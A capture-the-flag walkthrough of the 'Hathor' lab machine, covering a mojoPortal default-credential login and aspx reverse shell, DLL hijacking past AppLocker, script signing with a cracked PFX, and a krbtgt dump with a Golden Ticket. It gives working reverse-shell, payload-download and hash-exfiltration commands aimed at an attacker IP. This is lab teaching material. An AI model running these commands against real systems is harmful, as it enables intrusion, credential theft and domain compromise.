
Hathor

Summary

Nmap discovers a website and a virtual host for mojoPortal. We register for an account on mojoPortal and notice an admin user. Searching for the mojoPortal default credentials finds [email protected]:admin, which works! As admin, we are able to edit a file and replace its contents with an aspx reverse shell. Then, we copy that file to a name with the .aspx file extension so it can be executed. We figure out where the file is stored on the server and then make a GET request to it to get a reverse shell.

Now that we are on the box, we look around and notice the C:\Get-bADpasswords directory, which contains the program improsec/Get-bADpasswords. There is a logs folder that indicates that the user BeatriceMill has a weak password. We find BeatriceMill's password hash in a CSV file written by the program and then crack it with CrackStation.

We look at the SMB shares and mount the share named share as the BeatriceMill user, who has write access. According to the AppLocker policy, C:\share\Bginfo64.exe is allowed to run, so we aim to overwrite it with a netcat binary to spawn a reverse shell. We discover that a scheduled task (the Windows equivalent of a cronjob) runs the exe in the share. So, we hijack the 7-zip64.dll DLL using the second exploit listed under the "Your own" header from this HackTricks guide. Our DLL takes ownership of the Bginfo64.exe executable, grants everyone full access to it, downloads a static netcat binary from our machine over it, and then executes that netcat binary to get a reverse shell.

We now have a reverse shell as the ginawild user and we get the user.txt flag. In the Recycle Bin we find a PFX file. We download it and crack it using john. We can assume that this certificate was used to sign the Get-bADpasswords.ps1 file so that it would be able to run (see powershell signing for more information). Additionally, there is a run.vbs script in the C:\Get-bADpasswords directory that creates a Windows event. We assume something picks up that event and executes the C:\Get-bADpasswords\Get-bADpasswords.ps1 script as a different user. So, we replace Get-bADpasswords.ps1 with a reverse shell and sign it with the certificate to get a reverse shell as the bpassrunner user.

For this final part we perform a Golden Ticket attack. To do this we need the NTLM hash of the krbtgt user. Using Get-ADReplAccount, we dump the hashes for many accounts and transfer them to our machine. With the krbtgt NTLM hash, we use impacket's ticketer.py to create a ticket as the Administrator user. Finally, we use wmiexec.py to get a shell and grab the root.txt flag.

Enumeration

Nmap

First, let's scan for open ports using nmap. We can quickly scan for open ports and store them in a variable: ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.147 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running nmap's built-in scripts: nmap -p$ports -sC -sV 10.10.11.147.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Home - mojoPortal
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-robots.txt: 29 disallowed entries (15 shown)
| /CaptchaImage.ashx* /Admin/ /App_Browsers/ /App_Code/
| /App_Data/ /App_Themes/ /bin/ /Blog/ViewCategory.aspx$
| /Blog/ViewArchive.aspx$ /Data/SiteImages/emoticons /MyPage.aspx
|_/MyPage.aspx$ /MyPage.aspx* /NeatHtml/ /NeatUpload/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-06 19:06:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-06T19:08:09+00:00; -10s from scanner time.
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after:  2023-03-18T07:51:40
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after:  2023-03-18T07:51:40
|_ssl-date: 2022-08-06T19:08:09+00:00; -10s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after:  2023-03-18T07:51:40
|_ssl-date: 2022-08-06T19:08:09+00:00; -10s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-06T19:08:09+00:00; -10s from scanner time.
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after:  2023-03-18T07:51:40
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49699/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
56024/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HATHOR; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: -10s, deviation: 0s, median: -10s
| smb2-time:
|   date: 2022-08-06T19:07:32
|_  start_date: N/A

We see references to hathor.windcorp.htb, so let's add that domain to /etc/hosts: echo "10.10.11.147 windcorp.htb hathor.windcorp.htb" | sudo tee -a /etc/hosts.

Website (Port 80)

The website appears to be powered by software called "mojoPortal" (according to the page title). The main page says that the site is under construction:

There is a login link at the bottom:

Let's try to register for an account:

We get a settings icon on the left side of the page with a link to the member list at http://windcorp.htb/MemberList.aspx:

There is an admin user, so we probably want to try and get access to that account.

Let's try to bruteforce directories. This produces a lot of 403 - Forbidden: Access is denied errors, so we filter those out with -fc 403 by running ffuf -ic -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://windcorp.htb/FUZZ/ -fc 403:

Searching for "mojoPortal default credentials" finds this forum thread. Trying the default credentials of [email protected]:admin works!

We get some possibly useful version numbers from http://windcorp.htb/Admin/ServerInformation.aspx:

On the file manager page at http://windcorp.htb/FileManager?view=fullpage we can copy, edit, and upload files:

We can generate a reverse shell using msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=46738 -f aspx > meterpreter.aspx, but for some reason this doesn't work. So, instead I used this reverse shell script.

Attempting to upload this file gives us an error since aspx files are not allowed:

In the file manager we can edit the file at /htmlfragments/fragment1.htm and replace its contents with the reverse shell:

Then, we copy the file to /htmlfragments/shell.aspx, which succeeds even though the new file does not show up in the file browser: the listing filters out ".aspx" names, but the copy itself is not blocked. In other words, the extension check is only applied to uploads, not to copies or renames of files already on the server.

If we go to the "Content Manager" at http://windcorp.htb/Admin/ContentCatalog.aspx, we can edit the home page, which has the "Under Construction" image on it. If we view the properties of that image we can view its path:

The underconstruction.png was located in the root of the file explorer, so we can assume that the path /Data/Sites/1/media/ brings us to the root of the file explorer. Therefore, our shell is at /Data/Sites/1/media/htmlfragments/shell.aspx.

We start a listener with nc -nvlp 8344 and navigate to http://windcorp.htb/Data/Sites/1/media/htmlfragments/shell.aspx to get a reverse shell!

Foothold

We run dir C:\ and notice a strange directory called Get-bADpasswords:

Searching for this tool online finds improsec/Get-bADpasswords. According to its README, "this module is able to compare password hashes of enabled Active Directory users against bad/weak/non-compliant passwords (e.g. hackers first guess in brute-force attacks)."

We look around this folder and find a logs directory at C:\Get-bADpasswords\Accessible\Logs:

The log file log_windcorp-05102021-183949.txt indicates that the user BeatriceMill has a weak password.

In the C:\Get-bADpasswords\Accessible\CSVs directory, we read the exported_windcorp-05102021-183949.csv file, which has a password hash:

Putting 9cb01504ba0247ad5c6e08f7ccae7903 into CrackStation reveals that the hash is an NTLM hash (32 hex characters, as expected for an NT hash) and that the password is !!!!ilovegood17.

So, now we have a valid set of credentials BeatriceMill:!!!!ilovegood17.

Getting User

With our new credentials we are able to dump LDAP by running ldapsearch -x -H ldap://windcorp.htb -D 'windcorp\BeatriceMill' -w '!!!!ilovegood17' -b "DC=windcorp,DC=htb" > ldap_results.txt, but this doesn't give us much information (see ldap_results.txt).

We run net view \\hathor, which shows us an SMB share named share:

We can mount this share by running net use x: \\hathor\share (from this SuperUser answer). However, if we try to read it with dir X:\ we get "Access is denied." We can run net use x: /delete to unmount the share.

Let's try with the BeatriceMill user: net use x: \\hathor\share /user:windcorp.htb\BeatriceMill !!!!ilovegood17 (command from this SuperUser answer).

Contents of the share:

We have write access to this share since we can copy a null byte to a new file within it by running copy NUL X:\thing.txt.

We run Get-AppLockerPolicy -effective -xml to see the AppLocker policy and determine which applications are allowed to run. We see that %OSDRIVE%\share\Bginfo64.exe (%OSDRIVE% expands to C:) is allowed to be executed, so we will overwrite that file with our reverse shell: an AppLocker path rule trusts the location, not the contents of the file, and we already know we can write to the share.
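The following is an added example, not code from the writeup: it pulls the effective policy as XML, lists the Exe path rules with the SID they apply to, and then asks AppLocker directly whether Bginfo64.exe would run for BeatriceMill. It assumes the AppLocker module is available (the writeup already runs Get-AppLockerPolicy on the box); Test-AppLockerPolicy needs the tested file to exist on disk.

```powershell
# Added example (not part of the original writeup): enumerate AppLocker path rules
# and confirm the decision for one binary and one user.

# Effective policy as XML, so the rule structure is explicit.
[xml]$policy = Get-AppLockerPolicy -Effective -Xml

# Each RuleCollection (Exe, Dll, Script, Msi, Appx) carries its own enforcement mode;
# a collection in AuditOnly mode does not block anything.
$policy.AppLockerPolicy.RuleCollection |
    Select-Object Type, EnforcementMode |
    Format-Table -AutoSize

# Path rules in the Exe collection: who they apply to, what they allow, and where.
# An Allow rule for S-1-1-0 ("Everyone") on a path we can write to is the weakness:
# AppLocker trusts the location, not the file content.
$exe = $policy.AppLockerPolicy.RuleCollection | Where-Object Type -eq 'Exe'
$exe.FilePathRule | ForEach-Object {
    [pscustomobject]@{
        Name   = $_.Name
        Action = $_.Action
        Sid    = $_.UserOrGroupSid
        Path   = $_.Conditions.FilePathCondition.Path
    }
} | Format-Table -AutoSize

# %OSDRIVE% expands to the system drive (C: here). Ask AppLocker for its decision
# on the candidate binary as BeatriceMill; MatchingRule names the rule that decided.
Get-AppLockerPolicy -Effective |
    Test-AppLockerPolicy -Path 'C:\share\Bginfo64.exe' -User 'windcorp\BeatriceMill' |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize
```

If the Exe collection were in AuditOnly mode, or the matching rule were a publisher or hash rule instead of a path rule, overwriting the file would not buy anything; the XML view makes that visible before any effort is spent on the share.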

We can hijack the 7-zip64.dll DLL file using the second exploit listed under the "Your own" header from this HackTricks guide. This works because a scheduled task periodically runs the exe in the share, which loads 7-zip64.dll from the share's scripts directory, so our DLL's code runs as whatever user that task runs as.

With this DLL, we take ownership of the Bginfo64.exe executable, grant everyone full access to it, download the static netcat binary from our machine over Bginfo64.exe (so the AppLocker path rule that allows Bginfo64.exe now allows netcat), and then execute it with our IP and port to get a reverse shell. The HackTricks template runs these commands from DllMain when the DLL is loaded. We compile it with x86_64-w64-mingw32-gcc -shared windows_dll.c -o 7-zip64.dll.

You can download the static netcat binary we use from this page (direct link). Note: The netcat binary you use matters. I originally used this one and that failed to launch a second reverse shell, which we need to do later.

We set up a listener with nc -nvlp 45446. Next, we start a web server with python -m http.server 5003. Finally, we overwrite the current DLL with ours by running curl.exe http://10.10.14.116:5003/7-zip64.dll -o X:\scripts\7-zip64.dll on the target. Then, wait about a minute for the scheduled task to fire and you should get a reverse shell.

We are now the windcorp\ginawild user. We can get the user.txt flag with type C:\Users\GinaWild\Desktop\user.txt.

Privilege Escalation (Part 1)

If we look in the recycle bin we see some files:

Looking in one of the folders finds a PFX file:

We can encode the file to base64 to easily copy and paste it by running certutil -encode -f C:\$Recycle.bin\S-1-5-21-3783586571-2109290616-3725730865-2663\$RLYS3KF.pfx tmp.b64 && cls && type tmp.b64 && del tmp.b64. certutil wraps its output in -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- lines regardless of the file type, so copy only the text between them and run xclip -o -selection clipboard | base64 -d -i > file.pfx to decode the text on your clipboard and save it to file.pfx.
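As an added example (not from the writeup), here is the same transfer done in pure PowerShell, with a SHA-256 printed alongside the base64 so the decoded copy can be checked on the attacker side; copy-pasting through a reverse-shell console silently drops or wraps characters often enough that this check is worth having. The PFX path is the one from the writeup; the function name is my own.

```powershell
# Added example (not part of the original writeup): move a binary file out through a
# text-only channel and be able to prove it arrived intact.

function Export-FileAsBase64 {
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$LineWidth = 76   # wrap like certutil/base64 so terminals do not mangle long lines
    )
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    $b64   = [System.Convert]::ToBase64String($bytes)
    # SHA-256 of the original so the receiving side can verify the decoded file.
    $hash  = (Get-FileHash -Path $Path -Algorithm SHA256).Hash.ToLower()
    $lines = for ($i = 0; $i -lt $b64.Length; $i += $LineWidth) {
        $b64.Substring($i, [Math]::Min($LineWidth, $b64.Length - $i))
    }
    [pscustomobject]@{
        Path   = $Path
        Bytes  = $bytes.Length
        Sha256 = $hash
        Base64 = ($lines -join "`n")
    }
}

# Single quotes matter: "$R..." would otherwise be expanded as a variable.
$pfx = 'C:\$Recycle.bin\S-1-5-21-3783586571-2109290616-3725730865-2663\$RLYS3KF.pfx'
$out = Export-FileAsBase64 -Path $pfx
"size={0} sha256={1}" -f $out.Bytes, $out.Sha256
$out.Base64
```

On the attacker side, paste the base64 into file.b64, run base64 -d file.b64 > file.pfx and sha256sum file.pfx, and compare against the hash printed above before spending time cracking a corrupted file.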

We cracked a PFX file in the Timelapse writeup. We can do it again by running pfx2john file.pfx > hash.txt and then running john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt. This gives us the password abceasyas123.

We can assume that this certificate was used to sign the Get-bADpasswords.ps1 file so that it would be able to run (see powershell signing for more information).

In the C:\Get-bADpasswords directory we have a run.vbs file:

So, when this run.vbs file is executed it creates an event in the Windows event log (see the documentation about eventcreate). I think something picks up that event and executes the C:\Get-bADpasswords\Get-bADpasswords.ps1 script as a different user. So, if we replace Get-bADpasswords.ps1 with a reverse shell and sign it with the certificate, we should get a reverse shell.

First, create a temporary directory with mkdir C:\Temp and then run copy C:\$Recycle.bin\S-1-5-21-3783586571-2109290616-3725730865-2663\$RLYS3KF.pfx C:\Temp\sign.pfx to copy the certificate. Start a listener with nc -nvlp 3997. Next, run cmd.exe /c "echo C:\share\Bginfo64.exe 10.10.14.116 3997 -e cmd.exe > C:\Get-bADpasswords\Get-bADpasswords.ps1" (Bginfo64.exe is the netcat binary we dropped earlier). Then, import the PFX with the password we found and sign the script with Set-AuthenticodeSignature; this must be run from PowerShell, not cmd.
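The following is an added example of that signing step, not the writeup's own snippet. It loads the PFX straight from the file with the cracked password (no certificate-store import needed), writes the payload, signs it, and reads the signature back so a failed signature is caught before run.vbs is triggered. Paths, IP and port are the ones from the writeup.

```powershell
# Added example (not part of the original writeup): sign the replaced script with the
# recovered PFX and verify the result before triggering the job.

$pfxPath = 'C:\Temp\sign.pfx'
$pfxPass = 'abceasyas123'
$script  = 'C:\Get-bADpasswords\Get-bADpasswords.ps1'

# Loading the certificate from the file is enough for Set-AuthenticodeSignature,
# as long as the PFX carries the private key.
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($pfxPath, $pfxPass)
"Signer: {0}  HasPrivateKey: {1}" -f $cert.Subject, $cert.HasPrivateKey
# Authenticode needs the Code Signing EKU (1.3.6.1.5.5.7.3.3); without it the cmdlet refuses.
$cert.EnhancedKeyUsageList | Format-Table FriendlyName, ObjectId -AutoSize

# Keep a copy of the original script, then replace it with the payload
# (Bginfo64.exe is the netcat binary dropped earlier).
Copy-Item -Path $script -Destination "$script.bak" -Force
Set-Content -Path $script -Value 'C:\share\Bginfo64.exe 10.10.14.116 3997 -e cmd.exe' -Encoding ASCII

# Sign and read the signature back. Status 'Valid' means hash and chain check out on this
# host; with a signer that does not chain to a root this host trusts you typically see
# 'UnknownError' for the chain even though the file hash in the signature is correct.
Set-AuthenticodeSignature -FilePath $script -Certificate $cert -HashAlgorithm SHA256 |
    Format-Table Status, StatusMessage -AutoSize
Get-AuthenticodeSignature -FilePath $script |
    Select-Object Status, @{ n = 'Signer'; e = { $_.SignerCertificate.Thumbprint } }
```

If HasPrivateKey comes back False, the PFX was exported without its key and cannot sign anything; if the EKU list lacks Code Signing, Set-AuthenticodeSignature errors out instead of producing a signature.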

Now, just run the VBS script with cscript C:\Get-bADpasswords\run.vbs. After a few seconds, you should get a reverse shell as windcorp\bpassrunner.

Privilege Escalation (Part 2)

For this part we perform a Golden Ticket attack. To do this we need the NTLM hash of the KRBTGT user, the account whose key the KDC uses to encrypt and sign every TGT; whoever holds that key can forge a TGT for any user in the domain. You can learn more about the KRBTGT user in this article.

We can run Get-ADReplAccount with get-adreplaccount -all -namingcontext 'DC=windcorp,DC=htb' -server hathor > hashes to create a file called hashes with the hashes for many accounts. This works because the account that runs Get-bADpasswords must be able to replicate password hashes from the DC, which is exactly what Get-ADReplAccount (from the DSInternals module the tool is built on) does.

Checking the size of the file shows that it is 42.8 MB, far too large for the base64 copy-and-paste trick we used for the PFX.

So, we run nc -nvlp 57010 > hashes on our machine and cmd /c "C:\share\Bginfo64.exe 10.10.14.116 57010 < hashes" on the target to download the file (Bginfo64.exe is our netcat binary, and cmd handles the < redirection). Tip: Use a command like watch ls -lh hashes to watch the file transfer progress, and compare the final size against 42.8 MB before trusting the copy.

Looking at the hashes file we find that the krbtgt NTLM hash is c639e5b331b0e5034c33dec179dcc792. We also need the domain SID, which is the Recycle Bin folder's SID without its last component (the RID): S-1-5-21-3783586571-2109290616-3725730865. Now, we can forge a ticket as the Administrator user by running ticketer.py -nthash c639e5b331b0e5034c33dec179dcc792 -domain-sid S-1-5-21-3783586571-2109290616-3725730865 -domain windcorp.htb Administrator.

Then, we point impacket at the ticket by running export KRB5CCNAME=administrator.ccache. Finally, we run wmiexec.py -no-pass -k -dc-ip hathor.windcorp.htb windcorp.htb/[email protected] to get a shell as the Administrator user (-k uses the Kerberos ticket from KRB5CCNAME and -no-pass skips the password prompt; the target must be given by hostname, not IP, and our clock must be within the default 5-minute Kerberos skew, which the -10s nmap reported easily satisfies). Then, just execute type C:\Users\Administrator\Desktop\root.txt to get the root.txt flag.
